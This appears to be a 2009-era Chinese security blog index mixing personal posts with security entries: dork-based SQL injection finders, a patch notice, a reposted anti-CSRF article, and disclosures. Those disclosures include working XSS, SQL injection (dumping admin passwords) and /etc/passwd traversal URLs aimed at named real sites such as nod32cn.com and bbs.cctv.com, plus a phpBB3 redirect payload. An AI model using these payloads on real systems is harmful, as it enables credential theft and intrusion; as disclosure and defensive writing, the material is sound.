SimpleDorkGUi & G-Injector
作者:ZhaoHuAn 日期:2009-05-30
顾名思义,就是通过搜索引擎定义关键字来自动查找注入点的工具。对于比较庞大、脚本种类比较复杂的大型站点做渗透有所帮助。例如:site:qq.com inurl:php?id=
SimpleDorkGUi是low1z今年年初用python写的一个图形界面的注入点搜索程序,现在已经推出了第二版。它可以通过根据你指定的搜索参数来进行搜索包含sql注入的地址,并判断数据类型。缺点是不能保存当前搜索进程以便下次的继续探测,不过0.2版本已经中加入了这个功能。
0.2版的代码在:
http://www.darkc0de.com/others/simpleDorkGUi.py
/*老版本0.1版在win下运行的话,这里有处代码要修改下:
程序代码 否则你将会看不到下面的操作工具栏;) */
0.1版建议运行在python 2.x版本上,因为python 3.x的不向后兼容,一些类似exec和print语句在3.x版本被去除或修改了导致程序报错。如果非要在3.x下运行的朋友可以自己修改一下代码,或者用官方提供的转换器转换一下:
Py(2to3)
http://svn.python.org/view/sandbox/trunk/2to3/
G-Injector(perl)是法国小伙jonathan59的作品,以前常在h4cky0u玩的朋友应该对他比较熟悉
[img]ht...
SimpleDorkGUi是low1z今年年初用python写的一个图形界面的注入点搜索程序,现在已经推出了第二版。它可以通过根据你指定的搜索参数来进行搜索包含sql注入的地址,并判断数据类型。缺点是不能保存当前搜索进程以便下次的继续探测,不过0.2版本已经中加入了这个功能。
0.2版的代码在:
http://www.darkc0de.com/others/simpleDorkGUi.py
/*老版本0.1版在win下运行的话,这里有处代码要修改下:
程序代码txtField = Text(myFrame, font=('Verdana', 8, ''),fg='orange', bg='black', width=400, height=32, wrap=WORD, yscrollcommand=scb.set)
0.1版建议运行在python 2.x版本上,因为python 3.x的不向后兼容,一些类似exec和print语句在3.x版本被去除或修改了导致程序报错。如果非要在3.x下运行的朋友可以自己修改一下代码,或者用官方提供的转换器转换一下:
Py(2to3)
http://svn.python.org/view/sandbox/trunk/2to3/
G-Injector(perl)是法国小伙jonathan59的作品,以前常在h4cky0u玩的朋友应该对他比较熟悉
[img]ht...
[MS09-012]Token Kidnapping 安全补丁(KB956572)
作者:ZhaoHuAn 日期:2009-04-20
去年win下最流行的一个本地提权的漏洞微软终于放出补丁了。。
http://www.microsoft.com/downloads/details.aspx?familyid=73D2324F-BE59-4B0C-B1AC-9876A13C2C03&displaylang=zh-cn
http://www.microsoft.com/downloads/details.aspx?familyid=73D2324F-BE59-4B0C-B1AC-9876A13C2C03&displaylang=zh-cn
Discuz <=7.0(frame.php) xss Vulnerability
作者:ZhaoHuAn 日期:2009-04-18
前段时间做风险评估的时候发现的,这个xss 需要在开启了左右分栏的情况下才可以触发。
PoC:
程序代码
----->
跳转到了
程序代码
PoC:
程序代码http://bbs.cctv.com/index.php?gid=24"></iframe><script>alert(document.cookie)</script>
----->
跳转到了
程序代码http://bbs.cctv.com/frame.php?frameon=yes&referer=http%3A//bbs.cctv.com/index.php%3Fgid%3D24%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
摘一下老爸发的留言。
作者:ZhaoHuAn 日期:2009-04-09
(2009-04-09 20:55:21) 关耳
人的一生怎样都可以度过,默默无闻的是一生,煊煊赫赫的也是一生。但为人者总要对生命负责。伟大、英雄未必人人能够,但总得建功立德,总要活出人的尊严。有本事要靠本事,没本事也要有德行。生命可以承受无边的苦难,但承受不了无足轻重;生命可以承受贫病交加,但承受不了同类的冷落;生命可以承受挫折失败,但承受不了尊严的失缺;生命也可以承受忍辱负重,但它承受不了永无成功的荣耀。一个人在百年之内总得为自己的生命挣得一点自豪与骄傲,也应该在自己力所能及的层级上,为生命挣下一两次可以在众人之中君临端坐的首席之位。即使生命对此并无奢求,也要有一点点创造,有一点点作为,来证明自己曾在这个世界上活过。
人的一生怎样都可以度过,默默无闻的是一生,煊煊赫赫的也是一生。但为人者总要对生命负责。伟大、英雄未必人人能够,但总得建功立德,总要活出人的尊严。有本事要靠本事,没本事也要有德行。生命可以承受无边的苦难,但承受不了无足轻重;生命可以承受贫病交加,但承受不了同类的冷落;生命可以承受挫折失败,但承受不了尊严的失缺;生命也可以承受忍辱负重,但它承受不了永无成功的荣耀。一个人在百年之内总得为自己的生命挣得一点自豪与骄傲,也应该在自己力所能及的层级上,为生命挣下一两次可以在众人之中君临端坐的首席之位。即使生命对此并无奢求,也要有一点点创造,有一点点作为,来证明自己曾在这个世界上活过。
做了一回伪歌迷~
作者:ZhaoHuAn 日期:2008-09-22
感谢朋友爱情证书和百度娱乐杨嘉~
逛街·随手拍的~
作者:ZhaoHuAn 日期:2008-09-22
@上海
作者:ZhaoHuAn 日期:2008-09-14
回北京几天了,整理一下上海行的照片,因此行主要不是在玩,所以只去了城隍庙&外滩这一片,为避免日后懒惰荒于梳理,借假期三天——中秋佳节之际BLOG一下。
到上海的飞机晚点,刚下飞机就匆忙打车到公司(前面省略排队候车20分钟#-_-!!),天公不作美,大暴雨,路上的积水将近20厘米厚,南方就是这么滋润啊,让我顿时倍感亲切:O 司机师傅说星期五很多公司提早下班或者不上班,又下雨,交通一定是非常之堵。印象中是很久很久才到公司,司机师傅又把3号楼错认为是第3期楼,后来san哥跟我说原来SystEm32来的时候貌似也停这里,所以我一直怀疑是不是跟SystEm32坐的一辆车。。
san哥打着伞在门口接我,挖,终于见到崇拜已久的san师傅了,穿着nsfocus的黑色T恤,因为san哥素来低调,就不描述太多以免被K,膜拜一下 ^.^ 进了会议室后san哥拿了些巧克力和饼干给我,因为中午在飞机上随便吃了点,旅途劳累啊,还真有点饿了:P 然后就是久仰的cnhawk师傅,就跟他聊起天来,而且我发现cnhawk师傅是跟谁聊都能让对方觉得非常开心的,HOHO。面试的时候SystEm32来了,32是一个很好的兄弟,只比我大三岁,但技术功底非常扎实,用CC总的话说,技术很好,小伙子很帅,呵呵,崇拜啊。。认识了一个很好的兄弟:)
晚上部门领导请大家吃饭,……省略N字,平时很少喝酒,不胜酒力啊。。。Orz(算是明白32为什么有意要加强喝酒训练了) 晕忽忽的跟san哥回家了,就记得打车时等了很久都不等不到。
这些天都住在san哥家,还是复式的房子,很宽敞,一个精致的小楼梯通2层,我自己住一间,很舒服,哈哈,有机会上楼梯看看,san哥和嫂子很照顾我又很客气,真的觉得很不好意思,早知道星期一过来就好了,给san哥夫妇添了不少麻烦啊..
&...
到上海的飞机晚点,刚下飞机就匆忙打车到公司(前面省略排队候车20分钟#-_-!!),天公不作美,大暴雨,路上的积水将近20厘米厚,南方就是这么滋润啊,让我顿时倍感亲切:O 司机师傅说星期五很多公司提早下班或者不上班,又下雨,交通一定是非常之堵。印象中是很久很久才到公司,司机师傅又把3号楼错认为是第3期楼,后来san哥跟我说原来SystEm32来的时候貌似也停这里,所以我一直怀疑是不是跟SystEm32坐的一辆车。。
san哥打着伞在门口接我,挖,终于见到崇拜已久的san师傅了,穿着nsfocus的黑色T恤,因为san哥素来低调,就不描述太多以免被K,膜拜一下 ^.^ 进了会议室后san哥拿了些巧克力和饼干给我,因为中午在飞机上随便吃了点,旅途劳累啊,还真有点饿了:P 然后就是久仰的cnhawk师傅,就跟他聊起天来,而且我发现cnhawk师傅是跟谁聊都能让对方觉得非常开心的,HOHO。面试的时候SystEm32来了,32是一个很好的兄弟,只比我大三岁,但技术功底非常扎实,用CC总的话说,技术很好,小伙子很帅,呵呵,崇拜啊。。认识了一个很好的兄弟:)
晚上部门领导请大家吃饭,……省略N字,平时很少喝酒,不胜酒力啊。。。Orz(算是明白32为什么有意要加强喝酒训练了) 晕忽忽的跟san哥回家了,就记得打车时等了很久都不等不到。
这些天都住在san哥家,还是复式的房子,很宽敞,一个精致的小楼梯通2层,我自己住一间,很舒服,哈哈,有机会上楼梯看看,san哥和嫂子很照顾我又很客气,真的觉得很不好意思,早知道星期一过来就好了,给san哥夫妇添了不少麻烦啊..
&...
[ZZ]防止CSRF攻击
作者:ZhaoHuAn 日期:2008-09-04
转一篇不错的文章,不是很新,有些地方可以看一看:)
《防止CSRF攻击》
译者:韩国峰
本文已经获得原作者Email授权----译者注
概览:
1. Hello World
2. 介绍
3. 关于认证技术
3.1 Cookies Hashing
3.2 HTTP来路
3.3 验证码
4. 一次性令牌
5. 最后的话
1.Hello World
欢迎来到崭新的Playhack.net的新季度开题项目报告。我非常高兴您能够再次回来让我们的c001项目重现。
希望您能喜欢这个新的短篇论文,我邀请你浏览位于http://www.playhack.net的全部新项目。
开始:几乎没有什么,只是一点香烟!:
呐喊:我向我的playhack m8s null,omni,god and emdel,ofc o str0ke大声呐喊!NEX 回来了。
2.介绍
我 对跨站请求伪造(Cross Site Request Forgery,即CSRF)技术有一定研究,但是对网站开发者应当采取的措施研究不深。这些日子在编写一个对用户和管理员(这些人对他们的任务并不明 晰:P)有高度安全要求的分布式网站程序时,我被这个话题深刻的纠缠了。
针对这种情况,我必须考虑程序最终可能受到的各个方面的可能的攻击威胁。
给我最多麻烦的就是Session欺骗(或者CSRF,你可以按照自己喜欢的方式称呼),因为这种攻击是完全以用户的身份,因此并没有百分百的可能性来防止它。
如果你对我刚才说所的Session欺骗并不太了解,那么你可以阅读:http://www.playhack.net/view.php?id=30
3.可行措施
Ok,从这里开始,我必须假定你对Session欺骗攻击的实施方法已经深刻领会了:P
让我们开始新的继续。
考虑到一个已经登录到网站的受信用户可以完成一些重要的或者私密的操作,攻击者尝试记性一个可能的登录攻击(但是...
《防止CSRF攻击》
译者:韩国峰
本文已经获得原作者Email授权----译者注
概览:
1. Hello World
2. 介绍
3. 关于认证技术
3.1 Cookies Hashing
3.2 HTTP来路
3.3 验证码
4. 一次性令牌
5. 最后的话
1.Hello World
欢迎来到崭新的Playhack.net的新季度开题项目报告。我非常高兴您能够再次回来让我们的c001项目重现。
希望您能喜欢这个新的短篇论文,我邀请你浏览位于http://www.playhack.net的全部新项目。
开始:几乎没有什么,只是一点香烟!:
呐喊:我向我的playhack m8s null,omni,god and emdel,ofc o str0ke大声呐喊!NEX 回来了。
2.介绍
我 对跨站请求伪造(Cross Site Request Forgery,即CSRF)技术有一定研究,但是对网站开发者应当采取的措施研究不深。这些日子在编写一个对用户和管理员(这些人对他们的任务并不明 晰:P)有高度安全要求的分布式网站程序时,我被这个话题深刻的纠缠了。
针对这种情况,我必须考虑程序最终可能受到的各个方面的可能的攻击威胁。
给我最多麻烦的就是Session欺骗(或者CSRF,你可以按照自己喜欢的方式称呼),因为这种攻击是完全以用户的身份,因此并没有百分百的可能性来防止它。
如果你对我刚才说所的Session欺骗并不太了解,那么你可以阅读:http://www.playhack.net/view.php?id=30
3.可行措施
Ok,从这里开始,我必须假定你对Session欺骗攻击的实施方法已经深刻领会了:P
让我们开始新的继续。
考虑到一个已经登录到网站的受信用户可以完成一些重要的或者私密的操作,攻击者尝试记性一个可能的登录攻击(但是...
二版科技寄来的NOD32安全套装
作者:ZhaoHuAn 日期:2008-08-22
XSS Private Messagging On PhpBB3(0day)
作者:ZhaoHuAn 日期:2008-08-18
################################################## ####################################
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]
程序代码
Where is:
程序代码
Redirect Code [Ascii --> Hex]:
程序代码
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]
程序代码http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779
Where is:
程序代码[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}
Redirect Code [Ascii --> Hex]:
程序代码[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74...
nod32官方web渗透测试
作者:ZhaoHuAn 日期:2008-08-16
前几天Ntsill叫我帮忙看看nod32官方站点,最近他们在负责这个,呵呵,简单测试了一下还是存在一些问题的
SQL注入:
管理员密码就爆出来了
程序代码
程序代码
Directory traversal:
http://www.nod32cn.com:80/virus.php?prefix=../../../../../../../../etc/passwd%00.html
default.php searchword
virus.php 过滤不严导致的跨站
XSS:
程序代码
程序代码
SQL注入:
管理员密码就爆出来了
程序代码http://www.nod32cn.com:80/default.php?aid=1+and+1=2+union+all+select+concat(username,char(58),password),2+from+manager--&p=2&id=86
程序代码http://www.nod32cn.com:80/VisualizeShop.php?vid=7+and+1%3D0&action=Edit
Directory traversal:
http://www.nod32cn.com:80/virus.php?prefix=../../../../../../../../etc/passwd%00.html
default.php searchword
virus.php 过滤不严导致的跨站
XSS:
程序代码http://www.nod32cn.com:80/virus.php?prefix=>"><ScRiPt%20%0a%0d>alert(/xss/)%3B</ScRiPt>
程序代码http://www.nod32cn.co...
